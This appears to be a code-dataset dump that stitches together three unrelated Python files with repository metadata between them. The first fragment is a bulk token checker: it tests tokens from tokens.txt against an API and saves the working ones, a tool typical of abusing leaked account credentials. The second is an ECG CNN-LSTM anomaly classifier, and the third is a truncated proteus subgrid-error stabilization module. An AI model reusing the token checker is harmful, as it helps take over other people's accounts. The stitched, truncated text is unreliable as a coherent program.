"Content-Type": "application/json"
})
if response.status_code == 200:
TOKENS_VALID += 1
TOKENS_VALID_LIST.append(token)
print(f'{Fore.GREEN}[VALID] {token}')
elif response.status_code == 401:
TOKENS_INVALID += 1
print(f'{Fore.RED}[INVALID] {token}')
elif response.status_code == 403:
TOKENS_LOCKED += 1
print(f'{Fore.RED}[LOCKED] {token}')
async def main():
global TOKENS_INVALID, TOKENS_LOCKED, TOKENS_VALID, TOKENS_LOADED, TOKENS_VALID_LIST
client = aiosonic.HTTPClient()
try:
with open('tokens.txt', 'r') as tokens:
filtered = filter_tokens(tokens)
TOKENS_LOADED = len(filtered)
async with TaskPool(10_000) as pool:
for token in filtered:
await pool.put(check(token, client))
print(f"{Fore.WHITE}Tokens Loaded: {TOKENS_LOADED} | Valid: {TOKENS_VALID} | Locked: {TOKENS_LOCKED} | Invalid: {TOKENS_INVALID}")
        with open('working.txt', 'w') as handle:
            handle.write('\n'.join(TOKENS_VALID_LIST))
input("Saved to working.txt, click enter to exit.")
except Exception as e:
print(e)
input('Can\'t open tokens.txt\nClick enter to exit!')
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| 32.755814
| 147
| 0.587859
|
794dd56a1523b27531f48737d515e251f07fc768
| 6,199
|
py
|
Python
|
S4_3_Unknown_AD/cnn_lstm.py
|
gaofujie1997/ECG-ADGAN
|
ee48bd4c8e5992d0e1180fb7bdf85b126ceba146
|
[
"MIT"
] | 2
|
2022-03-22T09:31:08.000Z
|
2022-03-22T09:41:30.000Z
|
S4_3_Unknown_AD/cnn_lstm.py
|
gaofujie1997/ECG-ADGAN
|
ee48bd4c8e5992d0e1180fb7bdf85b126ceba146
|
[
"MIT"
] | null | null | null |
S4_3_Unknown_AD/cnn_lstm.py
|
gaofujie1997/ECG-ADGAN
|
ee48bd4c8e5992d0e1180fb7bdf85b126ceba146
|
[
"MIT"
] | null | null | null |
import pickle
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
X_N = pickle.load(open("../data/X_AMMI_N.pkl", "rb"))[0:1000]
print(np.shape(X_N))
X_N_label = np.zeros([np.shape(X_N)[0], 1])
X_S = pickle.load(open("../data/X_AMMI_S.pkl", "rb"))[0:330]
print(np.shape(X_S))
X_S_label = np.zeros([np.shape(X_S)[0], 1]) + 1
X_V = pickle.load(open("../data/X_AMMI_V.pkl", "rb"))[0:330]
print(np.shape(X_V))
X_V_label = np.zeros([np.shape(X_V)[0], 1]) + 1
X_F = pickle.load(open("../data/X_AMMI_F.pkl", "rb"))[0:330]
print(np.shape(X_F))
X_F_label = np.zeros([np.shape(X_F)[0], 1]) + 1
X_Q = pickle.load(open("../data/X_AMMI_Q.pkl", "rb"))[0:15]
print(np.shape(X_Q))
X_Q_label = np.zeros([np.shape(X_Q)[0], 1]) + 1
X_N_test = pickle.load(open("../data/X_AMMI_N.pkl", "rb"))[1000:1330]
print(np.shape(X_N_test))
X_N_test_label = np.zeros([np.shape(X_N_test)[0], 1])
X_S_test = pickle.load(open("../data/X_AMMI_S.pkl", "rb"))[330:660]
print(np.shape(X_S_test))
X_S_test_label = np.zeros([np.shape(X_S_test)[0], 1]) + 1
X_V_test = pickle.load(open("../data/X_AMMI_V.pkl", "rb"))[330:660]
print(np.shape(X_V_test))
X_V_test_label = np.zeros([np.shape(X_V_test)[0], 1]) + 1
X_F_test = pickle.load(open("../data/X_AMMI_F.pkl", "rb"))[330:660]
print(np.shape(X_F_test))
X_F_test_label = np.zeros([np.shape(X_F_test)[0], 1]) + 1
X_Q_test = pickle.load(open("../data/X_AMMI_Q.pkl", "rb"))[15:30]
print(np.shape(X_Q_test))
X_Q_test_label = np.zeros([np.shape(X_Q_test)[0], 1]) + 1
def buildModel():
    newModel = tf.keras.models.Sequential([
        tf.keras.layers.InputLayer(input_shape=(216, 1)),
        # First convolution layer: 4 kernels of size 21x1
        tf.keras.layers.Conv1D(filters=4, kernel_size=21, strides=1, padding='SAME', activation='relu'),
        # First pooling layer: max pooling over a 3x1 window, stride 2
        tf.keras.layers.MaxPool1D(pool_size=3, strides=2, padding='SAME'),
        # Second convolution layer: 16 kernels of size 23x1
        tf.keras.layers.Conv1D(filters=16, kernel_size=23, strides=1, padding='SAME', activation='relu'),
        # Second pooling layer: max pooling over a 3x1 window, stride 2
        tf.keras.layers.MaxPool1D(pool_size=3, strides=2, padding='SAME'),
        # Third convolution layer: 32 kernels of size 25x1
        tf.keras.layers.Conv1D(filters=32, kernel_size=25, strides=1, padding='SAME', activation='relu'),
        # Third pooling layer: average pooling over a 3x1 window, stride 2
        tf.keras.layers.AvgPool1D(pool_size=3, strides=2, padding='SAME'),
        # Fourth convolution layer: 64 kernels of size 27x1
        tf.keras.layers.Conv1D(filters=64, kernel_size=27, strides=1, padding='SAME', activation='relu'),
        tf.keras.layers.LSTM(128),
        # Flatten before the fully connected layers
        tf.keras.layers.Flatten(),
        # Fully connected layer, 128 units
        tf.keras.layers.Dense(128, activation='relu'),
        # Dropout layer, rate = 0.2
        tf.keras.layers.Dropout(rate=0.2),
        # Output layer: 2 units with softmax
        tf.keras.layers.Dense(2, activation='softmax')
    ])
    return newModel
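# Shape sanity check (a minimal sketch, not in the original script): the network
# maps a (batch, 216, 1) heartbeat segment to a 2-way softmax.
#   m = buildModel()
#   print(m(np.zeros((1, 216, 1), dtype="float32")).shape)  # -> (1, 2)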
def OutOfDatasetTest(TestData, TestLabel):
Y_pred = model.predict(TestData)
predict = np.argmax(Y_pred, axis=1)
# print(predict)
from sklearn.metrics import accuracy_score
print("acc:")
print(accuracy_score(TestLabel, predict))
from sklearn.metrics import precision_score
print("p:")
print(precision_score(TestLabel, predict))
from sklearn.metrics import recall_score
print("r:")
print(recall_score(TestLabel, predict))
from sklearn.metrics import f1_score
print("f1:")
print(f1_score(TestLabel, predict))
    from sklearn.metrics import confusion_matrix  # confusion matrix utility (also imported at module top)
    C1 = confusion_matrix(TestLabel, predict)  # TestLabel: ground-truth labels, shape (n, 1); predict: predicted labels
print(C1)
plt.matshow(C1, cmap=plt.cm.Greens)
plt.colorbar()
for i in range(len(C1)):
for j in range(len(C1)):
plt.annotate(C1[i, j], xy=(i, j), horizontalalignment='center', verticalalignment='center')
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.show()
def train_data_without_F():
X = np.concatenate((X_N, X_S, X_V, X_Q))
print(np.shape(X))
y = np.concatenate((X_N_label, X_S_label, X_V_label, X_Q_label))
np.shape(y)
return X, y
def train_data_without_V():
X = np.concatenate((X_N, X_S, X_F, X_Q))
print(np.shape(X))
y = np.concatenate((X_N_label, X_S_label, X_F_label, X_Q_label))
np.shape(y)
return X, y
def train_data_without_S():
X = np.concatenate((X_N, X_F, X_V, X_Q))
print(np.shape(X))
y = np.concatenate((X_N_label, X_F_label, X_V_label, X_Q_label))
np.shape(y)
return X, y
def train_data_without_Q():
X = np.concatenate((X_N, X_S, X_V, X_F))
print(np.shape(X))
y = np.concatenate((X_N_label, X_S_label, X_V_label, X_F_label))
np.shape(y)
return X, y
def test_data_without_F():
X = np.concatenate((X_N_test, X_S_test, X_V_test, X_Q_test))
print(np.shape(X))
y = np.concatenate((X_N_test_label, X_S_test_label, X_V_test_label, X_Q_test_label))
np.shape(y)
return X, y
def test_data_without_V():
X = np.concatenate((X_N_test, X_S_test, X_F_test, X_Q_test))
print(np.shape(X))
y = np.concatenate((X_N_test_label, X_S_test_label, X_F_test_label, X_Q_test_label))
np.shape(y)
return X, y
def test_data_without_S():
X = np.concatenate((X_N_test, X_F_test, X_V_test, X_Q_test))
print(np.shape(X))
y = np.concatenate((X_N_test_label, X_F_test_label, X_V_test_label, X_Q_test_label))
np.shape(y)
return X, y
def test_data_without_Q():
X = np.concatenate((X_N_test, X_S_test, X_V_test, X_F_test))
print(np.shape(X))
y = np.concatenate((X_N_test_label, X_S_test_label, X_V_test_label, X_F_test_label))
np.shape(y)
return X, y
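# Leave-one-class-out protocol (summarizing the helpers above): each
# train/test_data_without_X pair excludes beat class X from both splits, keeps
# N as label 0 and every other class as label 1; swap the two calls below to
# hold out a different class, e.g.
#   X, y = train_data_without_F()
#   X_test, y_test = test_data_without_F()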
X, y = train_data_without_Q()
X_test, y_test = test_data_without_Q()
model = buildModel()
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
# model.compile(optimizer='adam', loss='binary_crossentropy',metrics=['accuracy'])
model.summary()
# Train and evaluate
model.fit(X, y, epochs=50)
model.save("model/model_Q.h5")
# Y_pred = model.predict_classes(X_test)
# # plot the confusion matrix
# plotHeatMap(Y_test, Y_pred)
OutOfDatasetTest(X_test, y_test)
| 31.467005
| 105
| 0.670108
|
794dd5ab748d21c0db82b4304189cdc4cb87113a
| 173,983
|
py
|
Python
|
proteus/SubgridError.py
|
yuxianglin/proteus
|
ac5d5223410b1a1f270615f987e9cf327fb802af
|
[
"NASA-1.3"
] | null | null | null |
proteus/SubgridError.py
|
yuxianglin/proteus
|
ac5d5223410b1a1f270615f987e9cf327fb802af
|
[
"NASA-1.3"
] | null | null | null |
proteus/SubgridError.py
|
yuxianglin/proteus
|
ac5d5223410b1a1f270615f987e9cf327fb802af
|
[
"NASA-1.3"
] | null | null | null |
"""
A class hierarchy for subgrid error estimation methods (multiscale methods)
.. inheritance-diagram:: proteus.SubgridError
:parts: 1
"""
import numpy
import csubgridError
import FemTools
from .Profiling import logEvent
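# Typical lifecycle (a minimal sketch inferred from the SGE_base API below; the
# names `mesh`, `t0` and the quadrature dict `q` are illustrative, not taken
# verbatim from a proteus driver):
#
#   sge = SGE_base(coefficients, nd=2, lag=True)
#   sge.initializeElementQuadrature(mesh, t0, q)  # allocate tau arrays, alias *_sge entries
#   sge.calculateSubgridError(q)                  # subclasses fill q[('subgridError',ci)] and derivatives
#   sge.updateSubgridErrorHistory()               # copy tau into tau_last when lagging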
class SGE_base:
def __init__(self,coefficients,nd,lag=False,trackSubScales=False):
self.nc = coefficients.nc
self.nd = nd
self.components=range(self.nc)
self.lag=lag
self.coefficients=coefficients
self.trackSubScales = trackSubScales
self.usesGradientStabilization = False
def initializeElementQuadrature(self,mesh,t,cq):
self.mesh=mesh
self.tau=[]
self.tau_last=[]
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
else:
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for cj in range(self.nc):
if cq.has_key(('df',ci,cj)):
cq[('df_sge',ci,cj)]=cq[('df',ci,cj)]
if cq.has_key(('dH',ci,cj)):
cq[('dH_sge',ci,cj)]=cq[('dH',ci,cj)]
if cq.has_key(('dm',ci,cj)):
cq[('dm_sge',ci,cj)]=cq[('dm',ci,cj)]
if cq.has_key(('dmt',ci,cj)):
cq[('dmt_sge',ci,cj)]=cq[('dmt',ci,cj)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=cq[('grad(phi)',ck)]
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=cq[('dphi',ck,cj)]
cq[('da_sge',ci,ck,cj)]=cq[('da',ci,ck,cj)]
def initializeTimeIntegration(self,timeIntegration):
"""
allow for connection with time integration method if tracking subscales
"""
pass
def calculateSubgridError(self,q):
pass
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
def accumulateSubgridMassHistory(self,q):
"""
incorporate subgrid scale mass accumulation
        \delta m^{n}/\Delta t^{n+1}
"""
pass
class Advection_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('df',ci,ci)):
self.df_last = copy.deepcopy(cq[('df',ci,ci)])
cq[('df_sge',ci,ci)] = self.df_last
else:
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = cq[('df',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
self.df_last[:] = self.cq[('df',ci,ci)]
def calculateSubgridError(self,q):
for ci in range(self.nc):
csubgridError.calculateSubgridError_A_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[ci]
else:
tau=self.tau[ci]
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
class AdvectionLag_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('df',ci,ci)):
self.df_last = copy.deepcopy(cq[('df',ci,ci)])
cq[('df_sge',ci,ci)] = self.df_last
else:
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = cq[('df',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
self.df_last[:] = self.cq[('df',ci,ci)]
def calculateSubgridError(self,q):
for ci in range(self.nc):
csubgridError.calculateSubgridError_A_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('df_sge',ci,ci)],
q[('cfl',ci)],
self.tau[ci])
tau=self.tau[ci]
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
class AdvectionDiffusionReaction_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.cq=cq
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = copy.deepcopy(cq[('df',ci,ci)])
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = copy.deepcopy(cq[('dm',ci,ci)])
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = copy.deepcopy(cq[('dmt',ci,ci)])
else:
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = cq[('df',ci,ci)]
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = cq[('dm',ci,ci)]
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = cq[('dmt',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for ci,ckDict in self.coefficients.diffusion.iteritems():
if self.lag:#mwf looks like this was missing if lag May 7 09
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
else:
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=cq[('grad(phi)',ck)]
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=cq[('dphi',ck,cj)]
cq[('da_sge',ci,ck,cj)]=cq[('da',ci,ck,cj)]
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
#mwf should these be deep copies?
self.cq[('df_sge',ci,ci)][:] = self.cq[('df',ci,ci)]
self.cq[('dm_sge',ci,ci)][:] = self.cq[('dm',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
def calculateSubgridError(self,q):
        oldTau = False  # True -- mwf: oldTau not working with sd!
for ci in range(self.nc):
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[ci]
else:
tau=self.tau[ci]
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
#mwf debug
#import pdb
#pdb.set_trace()
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
class FFDarcyFC_ASGS(SGE_base):
"""
    basic stabilization for TwophaseDarcy_fc_ff, only 'mixture' equation has advection term
'w' phase equation has nonlinear diffusion wrt mixture potential,
'mixture' equation has two nonlinear diffusion terms
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
self.dftemp = None
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
for ci in [0]:
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('df',ci,ci)):
self.df_last = copy.deepcopy(cq[('df',ci,ci)])
cq[('df_sge',ci,ci)] = self.df_last
else:
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = cq[('df',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.cq=cq
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in [0]:
self.tau_last[ci][:] = self.tau[ci]
#self.df_last[:] = self.cq[('df',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
def calculateSubgridError(self,q):
oldTau = False
        if self.dftemp is None or self.dftemp.shape != q[('grad(phi)',1)].shape:
self.dftemp = numpy.zeros(q[('grad(phi)',1)].shape,'d')
ci = 0; cj = 0; ck = 1;
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
self.coefficients.sdInfo[(0,1)][0],self.coefficients.sdInfo[(0,1)][1],
self.mesh.elementDiametersArray,
q[('dmt',0,0)],
self.dftemp,
q[('a',0,1)],
q[('da',0,1,0)],
q[('grad(phi)',1)],
q[('dphi',1,0)],
q[('dr',0,0)],
q[('pe',0)],
q[('cfl',0)],
self.tau[0])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',0,0)],
self.dftemp,
q[('a',0,1)],
q[('da',0,1,0)],
q[('grad(phi)',1)],
q[('dphi',1,0)],
q[('dr',0,0)],
q[('pe',0)],
q[('cfl',0)],
self.tau[0])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
q[('dr',ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,ci)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
q[('dr',ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[0]
else:
tau=self.tau[0]
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',0)],
q[('dpdeResidual',0,0)],
q[('subgridError',0)],
q[('dsubgridError',0,0)])
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
class DarcyFC_ASGS(SGE_base):
"""
    basic stabilization for TwophaseDarcy_fc, no advection term
'w' phase and 'n' phase have nonlinear diffusion wrt to their own potential
phi_w = psi_w, phi_n = psi_w + psi_c
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
self.dftemp = None; self.drtmp = {(0,0):None,(1,0):None}
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
for ci in [0,1]:
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
else:
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.cq=cq
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in [0,1]:
self.tau_last[ci][:] = self.tau[ci]
#self.df_last[:] = self.cq[('df',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
def calculateSubgridError(self,q):
oldTau=False
        if self.dftemp is None or self.dftemp.shape != q[('grad(phi)',1)].shape:
self.dftemp = numpy.zeros(q[('grad(phi)',1)].shape,'d')
#'w' phase equation
ci = 0; cj = 0; ck = 0;
if q.has_key(('dr',ci,cj)):
self.drtmp[(ci,cj)] = q[('dr',ci,cj)]
        elif self.drtmp[(ci,cj)] is None:
self.drtmp[(ci,cj)] = numpy.zeros(q[('r',ci)].shape,'d')
        if self.drtmp[(ci,cj)] is None or self.drtmp[(ci,cj)].shape != q[('r',ci)].shape:
self.drtmp[(ci,cj)] = numpy.zeros(q[('r',ci)].shape,'d')
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
self.mesh.elementDiametersArray,
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
self.drtmp[(ci,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
self.drtmp[(ci,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
q['inverse(J)'],
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
self.drtmp[(ci,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
self.drtmp[(ci,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
#'n' phase equation
ci = 1; cj = 0; ck = 1;
if q.has_key(('dr',ci,cj)):
self.drtmp[(ci,cj)] = q[('dr',ci,cj)]
        elif self.drtmp[(ci,cj)] is None:
self.drtmp[(ci,cj)] = numpy.zeros(q[('r',ci)].shape,'d')
if oldTau:
if self.coefficients.sd:
                csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
                                                               self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
self.mesh.elementDiametersArray,
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
q['inverse(J)'],
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
